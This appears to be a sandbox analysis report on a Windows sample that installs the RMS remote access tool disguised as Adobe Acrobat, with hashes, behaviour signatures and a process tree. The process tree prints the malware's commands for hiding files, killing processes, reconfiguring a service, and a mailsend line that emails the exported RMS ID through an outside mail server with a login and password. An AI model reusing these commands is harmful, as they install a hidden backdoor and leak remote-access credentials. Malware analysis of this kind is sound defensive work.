Overview

overview

10

Static

static

7adfb53ec0...in.exe

windows7_x64

10

7adfb53ec0...in.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    25/02/2021, 00:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe

  • Size

    5.0MB

  • MD5

    24cae17860a840c0317018ef3d607e94

  • SHA1

    7595283fd24ebae9f95ea80209d674ca9bd2afcc

  • SHA256

    7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c

  • SHA512

    bdfe1b899ef55a0ae793e672c190d79161899179d98b0577b5ceda8f02c66376ca0d366c0f087dbb043d30c7ec41a39b0cd2fcc6be4d66639777c6430db3ee82

Score
10/10
rmsdiscoveryevasionrattrojan

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • Executes dropped EXE 8 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Stops running service(s) 3 TTPs
    evasion
  • Loads dropped DLL 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 27 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 4 IoCs
    evasion
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Program Files\Adobe\AdobeAcrobat\install.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat"
        3⤵
        • Drops file in Program Files directory
        • Views/modifies file attributes
        PID:1300
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\*.*"
        3⤵
        • Drops file in Program Files directory
        • Views/modifies file attributes
        PID:1168
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs"
        3⤵
        • Views/modifies file attributes
        PID:1952
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs\*.*"
        3⤵
        • Views/modifies file attributes
        PID:1704
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im rfusclient.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1872
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im rutserv.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1756
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im Acrobat-XI.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:664
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im AdobeFP.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1724
      • C:\Windows\SysWOW64\sc.exe
        sc delete AdobeReader
        3⤵
          PID:1596
        • C:\Windows\SysWOW64\reg.exe
          reg delete "HKLM\SYSTEM\Hardware Driver\LocalDisk" /f
          3⤵
            PID:1572
          • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
            "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /silentinstall
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1064
          • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
            "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /firewall
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:1780
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "C:\Program Files\Adobe\AdobeAcrobat\regedit.reg"
            3⤵
            • Runs .reg file with regedit
            PID:1464
          • C:\Windows\SysWOW64\sc.exe
            sc failure AdobeReader reset= 0 actions= restart/1000/restart/1000/restart/1000
            3⤵
              PID:1520
            • C:\Windows\SysWOW64\sc.exe
              sc config AdobeReader obj= LocalSystem type= interact type= own
              3⤵
                PID:1212
              • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
                "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /start
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1580
              • C:\Windows\SysWOW64\timeout.exe
                timeout 10
                3⤵
                • Delays execution with timeout.exe
                PID:744
              • C:\Windows\SysWOW64\reg.exe
                reg export "HKLM\SYSTEM\Hardware Driver\LocalDisk\v4\Server\Parameters" "IT.txt"
                3⤵
                • Drops file in Program Files directory
                PID:1212
              • C:\Windows\SysWOW64\timeout.exe
                timeout 10
                3⤵
                • Delays execution with timeout.exe
                PID:1668
              • C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe
                mailsend.exe -t [email protected] -attach IT.txt,application/txt -sub "RMS ID" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS ToktonIT" -ssl -auth-login -user [email protected] -pass hT*euyAyCT43 -q
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:1616
              • C:\Windows\SysWOW64\attrib.exe
                attrib "regedit.reg" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:604
              • C:\Windows\SysWOW64\attrib.exe
                attrib "install.bat" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:2020
              • C:\Windows\SysWOW64\attrib.exe
                attrib "IT.txt" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:1664
              • C:\Windows\SysWOW64\attrib.exe
                attrib "mailsend.exe" -S -H /S /D
                3⤵
                • Drops file in Program Files directory
                • Views/modifies file attributes
                PID:744
          • C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe
            "C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1728
            • C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe
              "C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1068
              • C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe
                "C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: SetClipboardViewer
                PID:1524
            • C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe
              "C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray
              2⤵
              • Executes dropped EXE
              PID:1688

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1056-3-0x0000000002C90000-0x0000000002C91000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1056-2-0x0000000075A61000-0x0000000075A63000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1064-31-0x0000000003C10000-0x0000000003C21000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1064-37-0x0000000000230000-0x0000000000231000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1064-32-0x0000000003800000-0x0000000003811000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1064-30-0x0000000003800000-0x0000000003811000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1068-59-0x00000000036C0000-0x00000000036D1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1068-60-0x0000000000230000-0x0000000000231000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1068-61-0x0000000003AD0000-0x0000000003AE1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1524-66-0x0000000000230000-0x0000000000231000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1580-48-0x00000000001C0000-0x00000000001C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1616-76-0x00000000025E0000-0x00000000025F1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1616-75-0x00000000029F0000-0x0000000002A01000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1616-74-0x00000000025E0000-0x00000000025F1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1688-62-0x0000000000230000-0x0000000000231000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1728-58-0x00000000001C0000-0x00000000001C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1780-47-0x0000000000230000-0x0000000000231000-memory.dmp

            Filesize

            4KB

            Download